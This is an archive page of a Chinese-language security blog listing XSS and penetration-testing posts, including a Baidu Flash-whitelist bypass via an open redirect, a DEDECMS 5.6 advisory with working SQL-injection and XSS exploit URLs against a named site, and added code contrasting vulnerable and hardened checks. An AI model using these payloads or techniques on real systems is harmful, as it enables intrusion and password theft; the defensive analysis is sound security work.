Archive

Posts tagged 'xss'

Guidebook On Cross Site Scripting

May 9, 2011   admin   1,631 views   1 comment

From:http://packetstormsecurity.org/files/view/99770/ixss.txt

// Best Viewed in Notepad++ with word wrap enabled :)

A Tribute To My Mother Land

" INDIA "
**********************************************************
We should be thankful and remember the bravery of Maharaja
Prithvi Raj Chauhan, Maharana Pratap, Chandra Shekhar Azad,
Bhagat Singh, Rajguru, Sukhdev and all those who gave their
lives for the sake of the freedom and sanctity of the land
named Hindustan (collectively India, Pakistan &
Bangladesh).

We might remember the intrepid spirit who raised an army
named "Azad Hind Fauj" from prisoners of World War II far
from India and fought for our freedom, the great Subhash
Chandra Bose. Remember his words of inspiration:

"Tum mujhe khoon do, main tumhe azaadi doonga"

We might get inspired by their great lives and follow
their thoughts.
**********************************************************

Important!... Warning!!!
The author does not take responsibility if anyone tries
these hacks against any organization or anything else that
makes him trespass security measures and brings him under
legal prosecution. These hacks are intended for the
improvement of security and for investigations by legal
security agencies. Educational institutions are hereby
requested to prevent their students from using the tools
provided in this paper against the corporate world. This
paper is a proof-of-concept and must be treated as such.

<|-[___________________________________________________________________________]-|>
-                                                                             -
-                          [ Cross Site Scripting ]                           -
-                         By Ankit Anand [CrazyAnkit]                         -
-                                                                             -
<|-[___________________________________________________________________________]-|>

# Written On 26 March 2011
# Author : Ankit Anand
# [ koolankit1993@gmail.com , ankitthehacker.wordpress.com ]
# Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
# Greetz Fly Out to :  RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0

// Reference : Exploit-db , Aoh [Orkut] , Google ;)

--==+================================================================================+==--
--==+                     Dedicated To My Loving parents                             +==--
--==+================================================================================+==--

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
Feel Free To Share This White paper , knowledge is for sharing , But Respect Author’s Hardwork . Give Proper Credits !

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( I   ]> Introduction
0x01: Introduction
0x02: Finding XSS-vulnerable websites
0x03: Executing XSS commands
0x04: Bypass techniques
0x05: Damage done by XSS
\_ 1.) Inject a phishing script
\_ 2.) Iframe phishing
\_ 3.) Redirect phishing
\_ 4.) Cookie stealing
\_ 5.) Defacing
\_ XSS cheat sheet
0x06: Fixing XSS holes
0x07: [The End]
|_| Conclusions

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>


Advanced XSS Knowledge

January 10, 2011   admin   2,129 views   No comments

<|-[___________________________________________________________________________]-|>
-                                                                             -
-                          [ Advanced XSS Knowledge ]                         -
-                             written by novaca!ne                            -
-                                                                             -
<|-[___________________________________________________________________________]-|>

# Author: novaca!ne
# Date:   23.03.2010

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc  °
Website: www.novacaine.biz      .
                                °
Artwork by: Vincenzo            .
                                °
Greetz fly out to:              .
                                °
Vincenzo, J0hn.X3r, fred777,    .
h0yt3r, Easy Laster, td0s,      °
Lorenz, Montaxx, maoshe, Palme  .
and free-hack.com               °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Index:                                °
--(  I  ]> Introduction               .
                                      °
--( II  ]> What exactly is XSS ?      .
                                      °
--( III ]> How to execute XSS commands.
                                      °
--( IV  ]> Bypass techniques          .
                                      °
--(  V  ]> What can we do with XSS ?  .
                                      °
--( VI  ]> How to fix XSS leakages    .
                                      °
--( VII ]> Cheat Sheets               .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°


Details of a cross-site vulnerability in Baidu X吧

May 4, 2010   admin   1,640 views   1 comment

Author:rayh4c [80sec] EMail: rayh4c#80sec.com

A while ago I found a number of security issues in QQ, Baidu and others; they have since been patched. The QQ one is too sensitive to publish, so here are a few excerpts of the Baidu details.

Vulnerability details:

Posts in Baidu X吧 may embed Flash, provided the Flash URL starts with one of the entries in a whitelist. The whitelist is:

flashWhiteList:["http://www.tudou.com/v/",
"http://www.tudou.com/player/playlist.swf?lid=",
"http://6.cn/",
"http://player.ku6.com/refer/",
"http://img.ku6.com/common/V2.0.baidu.swf?vid=",
"http://tv.mofile.com/cn/xplayer.swf?v=",
"http://v.blog.sohu.com/fo/v4/",
"http://v.blog.sohu.com/fo/p4/",
"http://img.openv.tv/hd/swf/hd_player.swf?pid=",
"http://www.cnboo.com/flash/player.swf?ids=",
"http://video.pomoho.com/swf/out_player.swf?flvid=",
"http://video.cctv.com/flash/cctv_player.swf?VideoID=",
"http://misc.home.news.cn/video/swf/VideoDisplay.swf?videoSource=",
"http://mv.baidu.com/export/flashplayer.swf?playlist=",
"http://mv.baidu.com/export/flashplayer.swf?vid=",
"http://client.joy.cn/flvplayer/",
"http://player.youku.com/player.php/sid/",
"http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php",
"http://xiyou.cntv.cn/player/OTvideoplayer.swf",
"http://player.youku.com/player.php",
"http://player.video.qiyi.com/"]

An attacker only needs to find, under one of the whitelisted URLs, a way to embed Flash of their own choosing. The whitelist entry http://6.cn/ is far too loose: any URL on http://6.cn that answers with a 301 or 302 redirect is enough to embed an arbitrary SWF, for example:

http://6.cn/logout.php?next_action=http://xxxxxx/xxxx.swf

The SWF injects a JS file into the current page and, through the window relationship with the referring page, injects the same JS across pages into the related window, so every page the user has browsed from X吧 gets the script automatically. The JS hijacks the user's clicks, forces a login, and records the password the user types!
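As an added example that is not part of rayh4c's post or Baidu's code, the check below reproduces the prefix-match behaviour the post describes, shows that the 6.cn redirector passes it, and contrasts it with a stricter parse-then-match check. The reduced allowlist, the path regex and the sample URLs are assumptions made for the demonstration.

```javascript
// Added example (not Baidu's code): a prefix allowlist for embedded Flash is
// defeated by an open redirect on an allowed host, because the browser loads
// whatever the redirect resolves to. The stricter check below is an assumed
// hardening, not the fix Baidu shipped.

// Reduced copy of the page's allowlist; the real one had 21 prefixes.
const FLASH_WHITELIST = [
  'http://www.tudou.com/v/',
  'http://6.cn/',
  'http://player.youku.com/player.php/sid/',
];

// Vulnerable check, as the post describes it: a URL that merely starts with
// an allowed prefix is accepted, so any redirector under http://6.cn/ passes.
function isAllowedByPrefix(url) {
  return FLASH_WHITELIST.some((prefix) => url.startsWith(prefix));
}

// Stricter check (assumption): parse the URL, require http(s) and no embedded
// credentials, an exact host match, a path matching the player's known shape
// (the regex is illustrative, not the real embed format), and no nested URL
// anywhere in path or query, which is the open-redirect smell.
const STRICT_RULES = [
  { host: 'www.tudou.com', path: /^\/v\/[A-Za-z0-9_-]+\/?$/ },
];

function hasNestedUrl(s) {
  let decoded = s;
  try { decoded = decodeURIComponent(s); } catch (_) { /* keep raw form */ }
  return /[a-z][a-z0-9+.-]*:\/\//i.test(decoded);
}

function isAllowedStrict(url) {
  let u;
  try { u = new URL(url); } catch (_) { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  if (u.username || u.password) return false;
  if (hasNestedUrl(u.pathname + u.search)) return false;
  // u.pathname is already normalised: "/v/../evil.swf" has become "/evil.swf",
  // so the path regex is applied to what the browser would actually fetch.
  return STRICT_RULES.some((r) => r.host === u.hostname && r.path.test(u.pathname));
}

// Constructed inputs: the redirector from the post plus a few variants.
const SAMPLES = [
  'http://6.cn/logout.php?next_action=http://xxxxxx/xxxx.swf',
  'http://www.tudou.com/v/abc123/',
  'http://www.tudou.com/v/../evil.swf',
  'http://www.tudou.com/v/abc123?u=http%3A%2F%2Fevil.example%2Fx.swf',
];

function classify(urls) {
  return urls.map((url) => ({
    url,
    prefix: isAllowedByPrefix(url),
    strict: isAllowedStrict(url),
  }));
}

for (const row of classify(SAMPLES)) {
  console.log(
    `${row.prefix ? 'prefix:ALLOW' : 'prefix:deny '}  ` +
    `${row.strict ? 'strict:ALLOW' : 'strict:deny '}  ${row.url}`,
  );
}
```

Even the strict check only moves the trust boundary onto the allowed host: if that host has its own open redirect, or lets users upload SWF files under an allowed path, the embed is still attacker-controlled. The damage the post describes (a script injected into the page and into the related window) also depends on the embed granting the SWF script access; embedding third-party Flash with allowScriptAccess="never" keeps a hostile SWF from reaching the page's DOM even when the allowlist fails.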

Category: Vulnerability Code

[zz] DEDECMS V5.6 GBK injection vulnerability

April 12, 2010   admin   1,997 views   No comments

DEDECMS 5.6 is finally about to be released, looking forward to it... There was no way to download the program, so I did a black-box test;
for now I cannot analyse it any further...
Well then.
The member center index (../member/index.php) filters its input loosely, giving blind SQL injection, database error mode, and XSS.
Test site: http://zz.5u.cn

=============================================
| # Title    : DEDECMS V5.6 GBK SQL injection Vulnerability
| # Author   : Akira
| # email    : MCAkira@HotMail.CoM
| # Home     : http://www.hackclub.net
| # Web Site : http://zz.u5.cn
| # Download : http://www.dedecms.com
| # Dork     : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.
| # Tested on: Microsoft Windows XP SP2 + Linux (Debian 5.0)
| # Bug      : SQL injection, XSS
==================== Exploit By Akira ================

http://zz.5u.cn/member/index.php?uid='%20||%20"%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'"><iframe%20src=http://www.milsec.net>
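The two XSS probes above break out of whatever HTML context the uid value is echoed into. The snippet below is an added example, not DEDECMS code: it assumes a template that reflects uid into an attribute value and into element text, renders the page's probes through it unescaped and escaped, and checks whether a tag the template never wrote has appeared.

```javascript
// Added example (not DEDECMS code): the reflected-XSS half of the advisory.
// A page that echoes the uid parameter into HTML without encoding lets the
// probes break out of the attribute; encoding every HTML metacharacter on
// output closes it. The template is an assumption for the demonstration.

// The page's own probes, percent-decoded (涛声依旧 is the decoded prefix).
const PROBES = [
  '涛声依旧WFXSSProbe\'")/>',
  '涛声依旧\'"><iframe src=http://www.milsec.net>',
];

// Output encoding for the HTML text and double-/single-quoted attribute
// contexts. Encoding "/" and "`" as well costs nothing and blocks a few
// older browser quirks; it is deliberately more than the minimum.
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
    "'": '&#39;', '`': '&#96;', '/': '&#47;',
  };
  return String(s).replace(/[&<>"'`/]/g, (c) => map[c]);
}

// Vulnerable template: raw reflection into an attribute and into text.
function renderVulnerable(uid) {
  return `<input name="uid" value="${uid}"><div class="who">${uid}</div>`;
}

// Hardened template: the same markup, with the value encoded at the sink.
function renderSafe(uid) {
  const e = escapeHtml(uid);
  return `<input name="uid" value="${e}"><div class="who">${e}</div>`;
}

// Structural check: the template writes exactly one <input> and one <div>;
// any other angle bracket inside the value slots means markup was injected.
function hasInjectedMarkup(html) {
  const expected = /^<input name="uid" value="[^<>]*"><div class="who">[^<>]*<\/div>$/;
  return !expected.test(html);
}

function probeResults(probes) {
  return probes.map((p) => ({
    probe: p,
    vulnerable: hasInjectedMarkup(renderVulnerable(p)),
    safe: hasInjectedMarkup(renderSafe(p)),
  }));
}

for (const r of probeResults(PROBES)) {
  console.log(`injected? raw=${r.vulnerable} escaped=${r.safe}  ${r.probe}`);
}
```

The structural check is only a demonstration aid; the real defence is that renderSafe encodes at the sink for the context it writes into. A value placed inside a script block, a URL attribute or an event handler needs its own encoding, which the HTML encoder above does not provide.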

Phishing attack techniques: analysis and countermeasures

April 8, 2010   admin   1,693 views   No comments

Phishing attack techniques: analysis and countermeasures

Author: rayh4c [80sec]
EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2008-12-22
From: http://www.80sec.com/release/Phishing.txt

[ Contents ]

0x00 The phishing landscape
0x01 How phishing works
0x02 URL encoding combined with phishing
0x03 Web vulnerabilities combined with phishing
0x04 Forged e-mail addresses combined with phishing
0x05 Browser vulnerabilities combined with phishing
0x06 How to defend against phishing attacks
0x07 Detecting phishing by matching page-content keywords against the URL
0x08 Afterword
0x09 References

0x00 The phishing landscape

Starting with IE7, browsers have added anti-phishing functionality as one of their security options, the Phishing Filter. IM software such as QQ has begun showing users security notices warning them about phishing. Most of the popular Web 2.0 sites, e-commerce, portals, SNS and blogs, have also begun posting notices warning their users about phishing.
With the chances of intrusion through traditional system and software vulnerabilities shrinking, phishing has gradually become an attack technique that hackers flock to. At the same time, both network client software and large websites have realised that phishing has become a serious problem and are actively defending against it.

0x01 How phishing works

Phishing is a form of social engineering attack. Simply put, it uses forged information to gain the victim's trust and elicit a response. Because online information grows explosively, people faced with information of every kind often cannot tell genuine from fake, which makes phishing over the network a very practical attack technique.

Category: Penetration Testing

A security assessment of the iGENUS mail system

April 3, 2010   admin   2,394 views   No comments

A security assessment of the iGENUS mail system

hackerxwar/gle [0x50]

This article was first published in Hacker Defense (黑客防线); copyright belongs to the author and Hacker Defense. Please do not reproduce without permission.

iGENUS is a widely deployed WebMail system for the Linux platform. Its installer sets it up quickly on CentOS Linux 3.x/4.x and RedHat Enterprise Linux AS3/AS4; the interface is polished and installation is simple, but it has serious security problems.

Finding a local file inclusion vulnerability

Since the software is not open source, only black-box testing was possible. The login page turned out to have a local file inclusion vulnerability, as shown in Figure 1.
The include looks something like include('language/'.$_GET['lang'].'_inc.php'). Because of the fixed suffix, the included filename generally has to be truncated here, unless we can control the contents of some '*_inc.php' file.

Figure 1


Category: Penetration Testing

[zz] Simple XSS penetration testing

March 4, 2010   root   1,452 views   No comments

Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2008-12-24
From: http://www.80sec.com/release/xss-how-to-root.txt

[ Contents ]

0x00 Preface
0x01 Basic approach to XSS penetration testing
0x02 A black-box XSS penetration test
0x03 A white-box XSS penetration test
0x04 Summary

0x00 Preface

With the web booming today, XSS has without doubt become the most "popular" vulnerability. I have seen penetration test reports from security companies listing dozens of high-risk XSS vulnerabilities, and more and more security researchers turning their attention to XSS attacks, finding 100 or even more than 1000 XSS issues.

Category: Penetration Testing